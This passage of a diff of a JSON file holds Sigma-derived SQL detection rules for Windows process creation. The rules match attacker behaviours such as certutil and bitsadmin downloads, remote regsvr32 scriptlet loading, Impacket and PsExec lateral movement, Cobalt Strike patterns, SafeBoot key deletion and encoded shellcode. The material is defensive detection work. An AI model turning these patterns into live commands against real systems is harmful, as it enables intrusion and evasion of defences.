spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", + "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.g0047", - "attack.t1021.005" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ultravnc_susp_execution.yml" + "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" }, { - "title": 
"Write Protect For Storage Disabled", - "id": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", - "status": "experimental", - "description": "Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", - "author": "Sreeman", + "title": "Defrag Deactivation", + "id": "958d81aa-8566-4cea-a565-59ccd4df27b0", + "status": "test", + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.persistence", + "attack.t1053.005", + "attack.s0111" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\system\\\\currentcontrolset\\\\control%' ESCAPE '\\' AND CommandLine LIKE '%write protection%' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\' AND (CommandLine LIKE '%storage%' ESCAPE '\\' OR CommandLine LIKE '%storagedevicepolicies%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '%/delete%' ESCAPE '\\' OR CommandLine LIKE '%/change%' ESCAPE '\\') AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_write_protect_for_storage_disabled.yml" + "filename": "proc_creation_win_apt_slingshot.yml" }, { - "title": "Suspicious File Execution From Internet Hosted WebDav Share", - "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", - "status": "experimental", - "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute 
some content in it. As seen being used in malicious LNK files", - "author": "pH-T (Nextron Systems)", + "title": "HackTool - Potential Impacket Lateral Movement Activity", + "id": "10c14723-61c7-4c75-92ca-9af245723ad2", + "status": "stable", + "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", + "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_cmd_net_use_and_exec_combo.yml" + "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" }, { - "title": "PowerShell Script Run in AppData", - "id": "ac175779-025a-4f12-98b0-acdaeb77ea85", + "title": "Suspicious Scheduled Task Name As GUID", + "id": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", "status": "experimental", - "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects creation of a scheduled task with a GUID like name", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1053.005" ], "falsepositives": [ - "Administrative scripts" + "Legitimate software naming their tasks as GUIDs" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%powershell.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\pwsh%' ESCAPE '\\' OR CommandLine LIKE '%pwsh.exe%' ESCAPE '\\') AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Roaming\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (CommandLine LIKE '%/TN \"{%' ESCAPE '\\' OR CommandLine LIKE '%/TN ''{%' ESCAPE '\\' OR CommandLine LIKE '%/TN {%' ESCAPE '\\') AND (CommandLine LIKE '%}\"%' ESCAPE '\\' OR CommandLine LIKE '%}''%' ESCAPE '\\' OR CommandLine LIKE '%} %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_susp_ps_appdata.yml" + "filename": "proc_creation_win_schtasks_guid_task_name.yml" }, { - "title": "Renamed PAExec Execution", - "id": 
"c4e49831-1496-40cf-8ce1-b53f942b02f9", - "status": "test", - "description": "Detects execution of renamed version of PAExec. Often used by attackers", - "author": "Florian Roth (Nextron Systems), Jason Lynch", + "title": "Wab/Wabmig Unusual Parent Or Child Processes", + "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "status": "experimental", + "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.execution" ], "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", - "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\paexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE 
'%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_paexec.yml" + "filename": "proc_creation_win_wab_unusual_parents.yml" }, { - "title": "PUA - Radmin Viewer Utility Execution", - "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "title": "Suspicious Service Binary Directory", + "id": "883faa95-175a-4e22-8181-e5761aeb373c", "status": "test", - "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", - "author": "frack113", + "description": "Detects a service binary running in a suspicious directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_radmin.yml" + "filename": "proc_creation_win_susp_service_dir.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Execution", - "id": "93bbde78-dc86-4e73-9ffc-ff8a384ca89c", - "status": "experimental", - "description": "Detects execution of known compromised version of 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Download Via Certutil.EXE", + "id": "19b08b1c-861d-4e75-a1ef-ea0c1baf202b", + "status": "test", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files.", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.t1027" ], "falsepositives": [ - "Legitimate usage of 3CXDesktopApp" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((OriginalFileName = '3CXDesktopApp.exe' OR NewProcessName LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' OR Product = '3CX Desktop App') AND FileVersion LIKE '%18.12.%' ESCAPE '\\') OR ((Hashes LIKE '%SHA256=DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=480DC408EF50BE69EBCF84B95750F7E93A8A1859%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B43A5D8B83C637D00D769660D01333E88F5A187%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=BB915073385DD16A846DFA318AFA3C19%' ESCAPE '\\' OR Hashes LIKE '%MD5=08D79E1FFFA244CC0DC61F7D2036ACA9%' ESCAPE '\\' OR Hashes LIKE '%MD5=4965EDF659753E3C05D800C6C8A23A7A%' ESCAPE '\\' OR Hashes LIKE '%SHA256=FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203%' ESCAPE '\\' OR Hashes LIKE '%SHA1=E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8433A94AEDB6380AC8D4610AF643FB0E5220C5CB%' ESCAPE '\\' OR Hashes LIKE '%SHA1=413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5%' ESCAPE '\\' OR Hashes LIKE '%MD5=9833A4779B69B38E3E51F04E395674C6%' ESCAPE '\\' OR Hashes LIKE '%MD5=704DB9184700481A56E5100FB56496CE%' ESCAPE '\\' OR Hashes LIKE '%MD5=8EE6802F085F7A9DF7E0303E65722DC0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868%' ESCAPE '\\' OR Hashes LIKE '%SHA256=59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E%' ESCAPE '\\' OR Hashes LIKE '%MD5=F3D4144860CA10BA60F7EF4D176CC736%' ESCAPE '\\' OR Hashes LIKE '%MD5=0EEB1C0133EB4D571178B2D9D14CE3E9%' ESCAPE '\\') OR sha256 IN ('DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC', '54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02', 'D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE', 'FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405', '5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734', 'A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203', 'AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868', '59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983') OR sha1 IN 
('480DC408EF50BE69EBCF84B95750F7E93A8A1859', '3B43A5D8B83C637D00D769660D01333E88F5A187', '6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA', 'E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1', '8433A94AEDB6380AC8D4610AF643FB0E5220C5CB', '413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5', 'BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA', 'BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E') OR md5 IN ('BB915073385DD16A846DFA318AFA3C19', '08D79E1FFFA244CC0DC61F7D2036ACA9', '4965EDF659753E3C05D800C6C8A23A7A', '9833A4779B69B38E3E51F04E395674C6', '704DB9184700481A56E5100FB56496CE', '8EE6802F085F7A9DF7E0303E65722DC0', 'F3D4144860CA10BA60F7EF4D176CC736', '0EEB1C0133EB4D571178B2D9D14CE3E9'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_3cx_compromise_execution.yml" + "filename": "proc_creation_win_certutil_download.yml" }, { - "title": "SafeBoot Registry Key Deleted Via Reg.EXE", - "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "title": "Potential CobaltStrike Process Patterns", + "id": "f35c5d71-b489-4e22-a115-f003df287317", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. 
Often used by attacker to prevent safeboot execution of security products", - "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", + "description": "Detects potential process patterns related to Cobalt Strike beacon activity", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cmd.exe /C whoami' ESCAPE '\\' AND ParentProcessName LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' AND CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\') OR (ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' AND ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') OR (ParentCommandLine LIKE '%/C whoami' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_delete_safeboot.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" }, { - "title": "PowerShell Base64 Encoded Shellcode", - "id": "2d117e49-e626-4c7c-bd1f-c3c0147774c8", - "status": "stable", - "description": "Detects Base64 encoded Shellcode", - "author": "Florian Roth (Nextron Systems)", + "title": "Griffon Malware Attack Pattern", + "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", + "status": 
"experimental", + "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR CommandLine LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_base64_shellcode.yml" + "filename": "proc_creation_win_malware_griffon_patterns.yml" }, { - "title": "Java Running with Remote Debugging", - "id": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", + "title": "File Download Via Bitsadmin", + "id": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", "status": "test", - "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file", + "author": "Michael Haag, FPT.EagleEye", "tags": [ - "attack.t1203", - "attack.execution" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Some legitimate apps use this, but limited." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%transport=dt\\_socket,address=%' ESCAPE '\\' AND (CommandLine LIKE '%jre1.%' ESCAPE '\\' OR CommandLine LIKE '%jdk1.%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%address=127.0.0.1%' ESCAPE '\\' OR CommandLine LIKE '%address=localhost%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR ((CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_java_remote_debugging.yml" + "filename": "proc_creation_win_bitsadmin_download.yml" }, { - "title": "Potential PsExec Remote Execution", - "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", - "status": "experimental", - "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Execute From Alternate Data Streams", + "id": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", + "status": "test", + "description": "Detects execution from an Alternate Data Stream (ADS). 
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", + "author": "frack113", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%txt:%' ESCAPE '\\' AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\') OR (CommandLine LIKE '%makecab %' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '% export %' ESCAPE '\\') OR (CommandLine LIKE '%regedit %' ESCAPE '\\' AND CommandLine LIKE '% /E %' ESCAPE '\\') OR (CommandLine LIKE '%esentutl %' ESCAPE '\\' AND CommandLine LIKE '% /y %' ESCAPE '\\' AND CommandLine LIKE '% /d %' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" + "filename": "proc_creation_win_susp_alternate_data_streams.yml" }, { - "title": "Regsvr32 Anomaly", - "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", - "status": "experimental", - "description": "Detects various anomalies in relation to regsvr32.exe", - "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", + "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", + "id": "37db85d1-b089-490a-a59a-c7b6f984f480", + "status": "test", + "description": "Detects usage of \"findstr\" with the argument \"385201\". 
Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.010", - "car.2019-04-002", - "car.2019-04-003" + "attack.discovery", + "attack.t1518.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR 
